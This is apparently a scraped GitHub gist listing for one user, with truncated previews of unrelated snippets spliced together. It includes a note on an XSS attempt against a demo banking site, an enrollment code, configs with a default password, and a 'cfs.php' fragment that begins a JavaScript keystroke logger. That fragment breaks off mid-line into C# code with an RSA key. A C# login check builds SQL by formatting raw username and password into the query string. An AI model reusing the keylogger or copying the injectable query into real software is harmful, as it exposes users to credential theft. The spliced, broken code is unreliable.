http://zero.webappsecurity.com
Username: username Password: password
Basic XSS Attempt, fails as the input is entity encoded but we can still exploit this.
Stephen Kapp mort666
mort666
/ gist:15b83c0bc60f5bd579d546f569339463
Created
December 9, 2023 19:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| & 'C:\Program Files\Defined Networking\DNClient\dnclient.exe' enroll -code HLFy5jh069gqph8UwyqNvpZ5s-LzYmyudyba8syFoEE |
mort666
/ preseed.cfg
Last active
March 2, 2023 20:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #### Contents of the preconfiguration file (for buster) | |
| # | |
| # The configuration fragments used in this file are also available as an | |
| # example preconfiguration file from: | |
| # https://www.debian.org/releases/buster/example-preseed.txt | |
| # | |
| # Some more preseed files that contain the full list of available preseed | |
| # options: | |
| # https://preseed.debian.net/debian-preseed/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh_authorized_keys: | |
| - github:mort666 | |
| hostname: rt-k3s-node-01 | |
| k3os: | |
| password: rancher | |
| ntp_servers: | |
| - 0.us.pool.ntp.org | |
| - 1.us.pool.ntp.org |
mort666
/ 0_reuse_code.js
Created
August 23, 2017 13:06
Here are some things you can do with Gists in GistBox.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Use Gists to store code you would like to remember later on | |
| console.log(window); // log the "window" object to the console |
Rails.application.configure do
config.force_ssl = Rails.env.production?
end
cfs.php
<head>
<script>
// array of user keystrokes
var keystrokes = [];
// event listener which captures user keystrokes
document.onkeypress = function(e) {
var key = (window.event) ? window.event.keyCode : e.which;
keystrokes.push(String.fromCharCode(key));// Encoded RSAPublicKey
private static String PUB_KEY = "30818902818100C4A06B7B52F8D17DC1CCB47362" +
"C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E" +
"D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2" +
"9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE" +
"2C3F4CBED9460129C72B0203010001";
public static void Main(string[] args)
{
mort666
/ keybase.md
Created
August 22, 2014 15:23
I hereby claim:
- I am mort666 on github.
- I am mort666 (https://keybase.io/mort666) on keybase.
- I have a public key whose fingerprint is 3E4A B984 100B C71E 7119 F862 CB48 2B9B 2F71 6CFE
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static Int64 CheckUser(string username, string password) | |
| { | |
| Int64 userID = 0; | |
| try | |
| { | |
| string getUserID = "SELECT userID FROM Users WHERE userName = '{0}' AND password = '{1}'"; | |
| using (SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings["ssbcon"].ConnectionString)) | |
| { | |
| conn.Open(); | |
| getUserID = String.Format(getUserID, username, password); |
NewerOlder